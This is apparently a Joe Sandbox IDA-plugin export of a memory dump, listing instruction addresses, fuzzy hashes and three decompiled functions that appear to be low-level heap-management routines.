0x0174ecb4
0x0174ecb6
0x0174ecb6
0x0174ecb9
0x0174ecbf
0x0178b7c1
0x0178b7c8
0x0178b7d3
0x0178b7db
0x0178b7ec
0x0178b858
0x00000000
0x0178b858
0x0178b7ee
0x0178b7f1
0x0178b7f4
0x0178b7ff
0x0178b850
0x00000000
0x0178b850
0x0178b80a
0x0178b813
0x0178b81c
0x0178b81d
0x0178b822
0x0178b825
0x0178b828
0x0178b831
0x0178b832
0x0178b837
0x0178b840
0x0178b842
0x0178b845
0x0178b848
0x00000000
0x0178b848
0x0178b7df
0x00000000
0x0178b7df
0x0178b7cc
0x00000000
0x0178b7cc
0x0174ecc5
0x0174ecc7
0x0174eccb
0x0178b79b
0x0178b79e
0x0178b7a4
0x00000000
0x00000000
0x0178b7a6
0x0178b7a8
0x0178b7a8
0x0174ecd3
0x00000000
0x00000000
0x00000000
0x00000000
0x0174ecd5
0x0174ecd5
0x0174ecd5
0x0174ecd8
0x0174ecda
0x0174ece4
0x00000000
0x00000000
0x0174ecea
0x0174eced
0x0174ecf0
0x0174ecf2
0x0174ecfb
0x0174ecfe
0x0174ed01
0x0174ed06
0x00000000
0x00000000
0x00000000
0x0174ed06
0x0178b7ae
0x0178b7b1
0x0178b7b7
0x00000000
0x00000000
0x0178b7b9
0x0178b7bb
0x0174ed08
0x0174ed08
0x0174ed0c
0x0174ed0c
0x00000000
0x0174ec60
0x0174ec62
0x0174ed0f
0x0174ed0f
0x00000000
0x0174ed0f
0x0174ec68
0x0174ec6c
0x0174ec6f
0x0174ec75
0x0174ec0d
0x0174ec0d
0x0174ec18
0x00000000
0x00000000
0x00000000
0x0174ec18
0x0174ec77
0x0174ec79
0x0174ec79
0x00000000
0x0174ec68
0x0174ec5e
0x0174ec3e
0x0174ebfd
0x0174ec02
0x0178b701
0x0178b70c
0x0178b71b
0x0178b71d
0x0178b71d
0x00000000
0x0178b70c
0x0174ec08
0x0174ec0a
0x00000000
0x0174ec0a
0x0174ebf5
0x0174ebf5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: c858ccc9031e4e88dd13676321d690b695969959ee16bdae3ead4997a910985a
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: B6814821A843568FEB215E6CC4C127DFB51FF52324B2C46BBD9828B342C7299886D795

Uniqueness

Uniqueness Score: -1.00%

Function 017E1D55 Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E017E1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x17f1070);
				E0176D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E017E337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E017E33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E017596E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E017E33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E0174E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1805880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = L0174DFDF(_t91, 1, _t142);
					}
					return E0176D0D1(_t103);
				}
			}

0x017e1d55
0x017e1d55
0x017e1d57
0x017e1d5c
0x017e1d63
0x017e1d66
0x017e1d69
0x017e1d6c
0x017e1d6e
0x017e1d71
0x017e1d74
0x017e1d77
0x017e1d7a
0x017e1d7d
0x017e1d82
0x017e1d85
0x017e1d88
0x017e1d8d
0x017e1d90
0x017e1d94
0x017e1d96
0x017e1d98
0x017e1d98
0x017e1d9b
0x017e1d9e
0x00000000
0x017e1da1
0x017e1da5
0x017e1e78
0x017e1e78
0x017e1e82
0x017e1e87
0x017e1e8a
0x017e1e8d
0x017e1e92
0x017e1e95
0x017e1e98
0x017e1e9b
0x017e1ede
0x017e1ee3
0x017e1ee8
0x017e1ef2
0x017e1ef2
0x017e1ef5
0x017e1ef8
0x017e1efe
0x017e1f03
0x00000000
0x017e1f09
0x017e1f0c
0x017e1f0e
0x017e1f11
0x00000000
0x017e1f17
0x017e1f17
0x017e1f1a
0x017e1f31
0x017e1f34
0x017e1f3f
0x017e1f42
0x017e1f45
0x017e1f47
0x017e1f4a
0x017e1f4d
0x017e1f4f
0x017e1f63
0x017e1f65
0x017e1f67
0x00000000
0x017e1f69
0x017e1f69
0x017e1f72
0x017e1f72
0x017e1f75
0x017e1f77
0x00000000
0x00000000
0x017e1f6e
0x017e1f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x017e1f70
0x017e1f83
0x017e1f83
0x017e1f85
0x00000000
0x017e1f85
0x017e1f51
0x017e1f53
0x017e1f5a
0x017e1f5c
0x017e1f87
0x017e1f87
0x017e1f87
0x017e1f8b
0x017e1f8d
0x017e1f90
0x00000000
0x017e1f90
0x017e1f1c
0x017e1f1c
0x00000000
0x017e1f22
0x017e1f22
0x017e1f25
0x017e1f28
0x017e1f97
0x017e1f97
0x017e1f9d
0x017e1fa7
0x017e1faa
0x017e1fb1
0x017e1fb9
0x017e1fbd
0x017e1fbe
0x017e1fc0
0x017e1f2a
0x017e1f93
0x017e1f93
0x017e1f95
0x00000000
0x00000000
0x00000000
0x00000000
0x017e1f95
0x017e1f28
0x017e1f1c
0x017e1f1a
0x017e1f11
0x017e1e9d
0x017e1ea0
0x017e1eae
0x017e1eb4
0x017e1ebc
0x017e1ebc
0x017e1ec2
0x017e1ec8
0x017e1ecd
0x00000000
0x017e1ed3
0x017e1ed3
0x00000000
0x017e1ed3
0x017e1ecd
0x017e1dab
0x017e1dab
0x017e1db1
0x017e1db3
0x017e1db9
0x017e1dbf
0x017e1dc2
0x017e1dda
0x017e1ddd
0x017e1de0
0x017e1de9
0x017e1dec
0x017e1def
0x017e1df1
0x017e1df3
0x017e1e0a
0x017e1e0c
0x017e1e0e
0x00000000
0x017e1e10
0x017e1e10
0x017e1e13
0x017e1e16
0x017e1e16
0x017e1e19
0x017e1e1c
0x017e1e1e
0x017e1e20
0x00000000
0x00000000
0x017e1e22
0x017e1e24
0x00000000
0x017e1e26
0x00000000
0x017e1e26
0x00000000
0x017e1e24
0x017e1e30
0x017e1e30
0x00000000
0x017e1e30
0x017e1df5
0x017e1df7
0x017e1e01
0x017e1e32
0x017e1e34
0x017e1e36
0x00000000
0x017e1e36
0x017e1dc4
0x017e1dc4
0x00000000
0x017e1dc6
0x017e1dc6
0x017e1dc9
0x017e1dcf
0x017e1dd1
0x017e1e38
0x017e1e38
0x017e1e38
0x017e1e38
0x017e1dc4
0x017e1dbb
0x017e1dbb
0x017e1dbb
0x017e1dbb
0x017e1e3a
0x017e1e3a
0x017e1e3d
0x017e1e40
0x017e1e43
0x017e1e6f
0x017e1fc7
0x017e1fc7
0x017e1e75
0x017e1e75
0x00000000
0x017e1e75
0x017e1e6f
0x017e1fca
0x017e1fca
0x017e1fce
0x017e1fd0
0x017e1fd0
0x017e1fd3
0x017e1fd9
0x017e1fde
0x017e1fe4
0x017e1fe4
0x017e1fee
0x017e1fee

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae84012a428e44b2dda656123dbb1a1589ab6ca36892d9da08bb940abd60a409
Instruction ID: 43b1c3b24c1a027a2ca8914f2d3423c19dd354c484eccf0be14d4e1e14b0ea9b
Opcode Fuzzy Hash: ae84012a428e44b2dda656123dbb1a1589ab6ca36892d9da08bb940abd60a409
Instruction Fuzzy Hash: 0F819A31E012198FCF18CFA8C8859ECFBF2BF5D324B644269E412AB385DB319945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 017DDBD2 Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E017DDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v5;
				signed short _v12;
				unsigned int _v16;
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				void* _t112;
				unsigned int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1806114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L017DD016(_t119, _t183, _t119, _t78);
									L0172FFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E017DC52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x16faff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										L0172FFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E017DE018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x16faff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E0175D340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E017DD864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E017DD8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E017DA80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}

0x017ddbdc
0x017ddbde
0x017ddbe1
0x017ddbed
0x017ddbef
0x017ddbf7
0x017ddbfd
0x017ddc00
0x017ddc04
0x017ddc07
0x017ddc0c
0x017ddd1f
0x017ddd1f
0x017ddd23
0x017ddd26
0x017ddd29
0x017ddd29
0x017ddd2c
0x017ddd32
0x017ddd35
0x00000000
0x017ddd38
0x017ddd3a
0x017ddd5d
0x017ddd63
0x017ddd69
0x017ddd6e
0x017ddd71
0x017ddd78
0x017ddd7d
0x017ddd8c
0x017ddd9e
0x017ddda0
0x017dddad
0x017dddb0
0x017dddb5
0x017dddb9
0x017dddd9
0x017dddd9
0x017dddde
0x017ddde0
0x017ddde3
0x017ddde5
0x017ddde9
0x017ddde9
0x017dddee
0x017dddf6
0x017dddf6
0x017ddd97
0x00000000
0x00000000
0x017ddd9b
0x00000000
0x017ddd9b
0x017ddd7f
0x00000000
0x017ddd7f
0x017ddd3f
0x017ddd54
0x017ddd58
0x017ddd86
0x00000000
0x017ddd86
0x00000000
0x017ddd5a
0x017ddd5a
0x017ddd5a
0x00000000
0x017ddd5a
0x017ddd3f
0x017ddd38
0x017ddc12
0x017ddc15
0x017ddc25
0x017ddc31
0x017ddc34
0x017ddc3b
0x017ddc3e
0x017ddc40
0x017ddc43
0x017ddc46
0x017ddc62
0x017ddc6b
0x017ddc6d
0x017ddc48
0x017ddc4b
0x017ddc59
0x017ddc5c
0x017ddc5c
0x017ddc72
0x017ddc78
0x017ddc7f
0x017ddc81
0x017ddc81
0x017ddc84
0x017ddc88
0x017ddc8d
0x017ddc95
0x017ddc9b
0x017ddca0
0x017ddca2
0x017ddca6
0x017ddca6
0x017ddcb0
0x017ddcd1
0x017ddcd4
0x017ddcda
0x017ddcec
0x017ddcf1
0x017ddcf6
0x017ddd0c
0x017ddd1a
0x017ddd1a
0x017ddcf6
0x00000000
0x017ddcda
0x017ddcb5
0x017ddcb6
0x017ddcc5
0x017ddcca
0x017ddcca

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca5fab3089da16b86bf5c1ea434f06f2a5ef275c6a308e2112d87af79f15f105
Instruction ID: 0d032c7d54a9f0c1c7518752e0f02a47dc8d01bee0a67039661f094f81adbf0b
Opcode Fuzzy Hash: ca5fab3089da16b86bf5c1ea434f06f2a5ef275c6a308e2112d87af79f15f105
Instruction Fuzzy Hash: FB71F575A0012D9FCF25DFA9C8809BEFBF5EF88210B144169E945EB384D634D945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 017E28EC Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E017E28EC(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E01732280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x1806110; // 0xad807883
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x1806110; // 0xad807883
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = L017E25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												L0172FFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x1806110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E017E2506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												L0172FFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E0175FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E017DA80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								L0172FFB0(_t115, _t145, _t147);
							}
							_t104 = E017E3149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E01732280(_t104, _t147);
								}
								_v5 = 0xff;
								E017E2876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}

0x017e28f5
0x017e28fa
0x017e28fe
0x017e2900
0x017e2906
0x017e2908
0x017e2908
0x017e290e
0x017e2915
0x017e2918
0x017e291b
0x017e291d
0x017e2920
0x017e2920
0x017e2929
0x017e292c
0x017e292f
0x017e2932
0x017e2935
0x017e2938
0x017e293d
0x017e293d
0x017e2940
0x017e2944
0x017e2944
0x017e2948
0x017e294a
0x017e2950
0x017e2953
0x017e2958
0x00000000
0x00000000
0x017e295a
0x017e2962
0x017e2965
0x017e2976
0x017e2978
0x017e29e0
0x017e29e4
0x017e29e6
0x017e29e8
0x017e29eb
0x017e2993
0x017e2993
0x00000000
0x017e2993
0x017e29ed
0x017e29ef
0x00000000
0x00000000
0x017e29f1
0x00000000
0x017e29f1
0x017e297a
0x017e299b
0x017e299d
0x017e29f5
0x017e29fb
0x017e29fb
0x017e2a00
0x017e2a04
0x017e2a04
0x017e2a06
0x017e2a13
0x017e2a13
0x017e2a18
0x017e2a44
0x017e2a44
0x017e2a44
0x017e2a46
0x017e2a50
0x017e2a5a
0x017e2a5e
0x017e2a99
0x017e2a9e
0x017e2aa0
0x017e2a70
0x017e2a70
0x017e2a72
0x017e2a75
